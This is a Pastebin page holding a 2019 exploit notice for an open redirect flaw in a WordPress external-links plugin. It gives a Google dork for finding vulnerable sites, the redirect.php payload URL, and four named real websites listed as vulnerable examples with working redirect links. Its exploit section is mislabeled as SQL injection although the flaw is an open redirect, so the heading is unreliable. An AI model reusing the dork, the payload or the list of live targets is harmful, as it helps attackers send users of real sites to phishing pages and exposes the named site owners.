API tools faq
paste
Advertisement
KingSkrupellos

WordPress WP-JS-External-Link-Info 2.2.0 Open Redirection

KingSkrupellos
Feb 13th, 2019
233
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.76 KB | None | 0 0
raw download clone embed print report
  1. ####################################################################
  2.  
  3. # Exploit Title : WordPress WP-JS-External-Link-Info Plugins 2.2.0 Open Redirection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 14/02/2019
  7. # Vendor Homepage : finewebdev.com
  8. # Software Download Link : downloads.wordpress.org/plugin/wp-external-links.1.81.zip
  9. downloads.wordpress.org/plugin/wp-external-links.2.2.0.zip
  10. # Software Information Link : wordpress.org/plugins/wp-external-links/
  11. # Software Version : 1.21 - 1.81 - 2.2.0 and all previous versions.
  12. # Tested On : Windows and Linux
  13. # Category : WebApps
  14. # Exploit Risk : Medium
  15. # Google Dorks : inurl:''/wp-content/plugins/wp-js-external-link-info''
  16. # Vulnerability Type : CWE-601: URL Redirection to Untrusted Site ('Open Redirect')
  17. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  18. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  19. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  20.  
  21. ####################################################################
  22.  
  23. # Description about Software :
  24. ***************************
  25. “WP External Links (nofollow new tab seo)” is open source software.
  26.  
  27. Manage external and internal links on your site.
  28.  
  29. ####################################################################
  30.  
  31. # Impact :
  32. ***********
  33. WordPress Plugin WP Js External Link Info is prone to an open redirect vulnerability
  34.  
  35. because the application fails to properly verify user-supplied input.
  36.  
  37. Exploiting this issue may allow attackers to redirect users to arbitrary web sites
  38.  
  39. and conduct phishing attacks; other attacks are also possible.
  40.  
  41. WordPress Plugin WP Js External Link Info version 1.21 - 1.81 and 2.2.0 is
  42.  
  43. vulnerable; prior versions may also be affected.
  44.  
  45. ####################################################################
  46.  
  47. # SQL Injection Exploit :
  48. **********************
  49.  
  50. /wp-content/plugins/wp-js-external-link-info/redirect.php?url=https://{OPEN-REDIRECTION}.gov
  51.  
  52. ####################################################################
  53.  
  54. # Example Vulnerable Sites :
  55. *************************
  56. [+] new.0points.com/wp/wp-content/plugins/wp-js-external-link-info/redirect.php?url=https://cxsecurity.com
  57.  
  58. [+] foerderverein-bergbad.de/wp-content/plugins/wp-js-external-link-info/redirect.php?url=https://packetstormsecurity.com
  59.  
  60. [+] wataaah.de/wp-content/plugins/wp-js-external-link-info/redirect.php?url=https://www.cyberizm.org/
  61.  
  62. [+] blogoprage.ru/wp-content/plugins/wp-js-external-link-info/redirect.php?url=https://exploit4arab.org
  63.  
  64. ####################################################################
  65.  
  66. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  67.  
  68. ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!